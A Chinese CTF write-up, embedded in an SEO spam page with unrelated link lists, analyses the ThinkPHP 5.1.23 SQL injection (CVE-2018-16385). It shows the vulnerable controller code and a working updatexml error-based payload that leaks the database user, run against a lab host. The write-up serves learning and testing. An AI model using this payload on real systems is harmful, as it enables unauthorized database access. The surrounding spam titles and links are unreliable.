当前位置: 首页 > news >正文

东莞外贸网站建站如何做属于自己的领券网站

东莞外贸网站建站,如何做属于自己的领券网站,网站开发的硬件设备,推广方法目录 漏洞描述 漏洞分析 漏洞复现 漏洞描述 漏洞发现时间#xff1a; 2018-09-04 CVE 参考#xff1a;CVE-2018-16385 最高严重级别#xff1a;低风险 受影响的系统#xff1a;ThinkPHP 5.1.23 漏洞描述#xff1a; ThinkPHP是一款快速、兼容、简单的轻量级国产P…目录 漏洞描述 漏洞分析 漏洞复现 漏洞描述 漏洞发现时间 2018-09-04 CVE 参考CVE-2018-16385 最高严重级别低风险 受影响的系统ThinkPHP 5.1.23 漏洞描述 ThinkPHP是一款快速、兼容、简单的轻量级国产PHP开发矿场解决了大部分应用开发的需求。 该漏洞与程序没有正确过滤数组的Key值导致在public/index/index/test/index中查询字符串时出现SQL注入漏洞有关。攻击者可以利用该漏洞获取数据库中当前用户名等数据。 漏洞分析 ?php namespace app\index\controller;class Test {public function index(){$dataarray();$data[username]array(eq,admin);$orderinput(get.order);//使用input函数进行安全过滤$mdb(user)-where($data)-order($order)-find();dump($m);} } 漏洞原因是处理order by参数时如果参数用户是可控的当参数为数组key value时未正确过滤处理数组的key值就会导致漏洞的产生。 首先定义了一个Test类该类包含一个名为index的公共方法。在该方法中首先创建了一个空数组$data。然后将值为array(eq, admin)的一维数组赋给$data[username]即$data数组中的一个元素。接下来使用input(get.order)语句获取来自GET请求的order参数并将其赋给$order变量。需要注意的是这里使用了input函数对输入数据进行了安全过滤。接下来代码使用$db(user)-where($data)语句查询数据库中满足$data条件的数据。然后使用$order变量对查询结果进行排序最后使用find()方法返回查询结果的第一个匹配项并将其存储在$m变量中。最后使用dump函数打印$m变量的内容。 漏洞复现 payload[!] Name: ThinkPHP5 SQL Injection Vulnerability Sensitive Information Disclosure VulnerabilityScript: thinkphp5_sqli.pyUrl: http://node5.buuoj.cn:29791/Vulnerable: TrueMethod: GETPayload: http://node5.buuoj.cn:29791/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]1 /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]1 经过poc验证此版本的thinkphp存在sql注入漏洞 flag{1ffdbdc4-020e-4d98-bb49-ccabed232769} ThinkPHP5 SQL注入漏洞 PDO真/伪预处理分析 | 离别歌 (leavesongs.com)https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html 具体漏洞分析
http://www.hkea.cn/news/14294666/

相关文章:

  • 做网站切图app推广接单渠道
  • 如何自己开发小程序青岛seo结算
  • 个人网站空间大小常用的搜索引擎网站
  • 小男孩与大人做的网站pc 手机网站
  • 如何做网站ip跳转网站制作专业的公司
  • 网站建设模板是什么wordpress参考文献
  • 瑞安市公用建设局网站河南省建设科技网站
  • 给一个网站如何做推广千锋教育培训收费一览表
  • 郑州网站设计见效快汉川建设局网站
  • 沧州开发网站多少钱邯郸做网站找谁
  • 百容千域可以免费做网站吗网页制作作业
  • 固镇做网站多少钱关于网站开发的期刊
  • 成品网站货源1688免费推荐做家具的企业网站
  • app与网站的关系免费网页游戏大全
  • 北京建设投标网站厦门网站设计公司排名
  • 政务网站建设工作的通知WordPress页脚小工具关闭
  • 网站建设项目分析报告wordpress禁止评论昵称外链
  • 电影资源网站开发酒店网站建设报告书
  • 如何用h5做网站沧州关键词排名按天收费
  • 中恒建设职业技术培训学校网站网站的类型及特点
  • 做个网站好还是做淘宝好学了lamp做网站就足够了吗
  • 如何自己做网站模版那个网站做代买
  • 网站首页建设中页面网件路由器登陆网址
  • 山西住房和城乡建设部网站首页济南行知做网站
  • 网站超市安装网站如何做IPV6支持
  • ftp网站服务器爬虫抓取大数据精准获客
  • wordpress formcraft 0.8下载seo按照搜索引擎的
  • 软文素材网站制作招聘海报的app
  • 文化传播公司网站模板电子商务网站建设前期规划方案
  • asp access网站建设源代码wordpress漏洞2019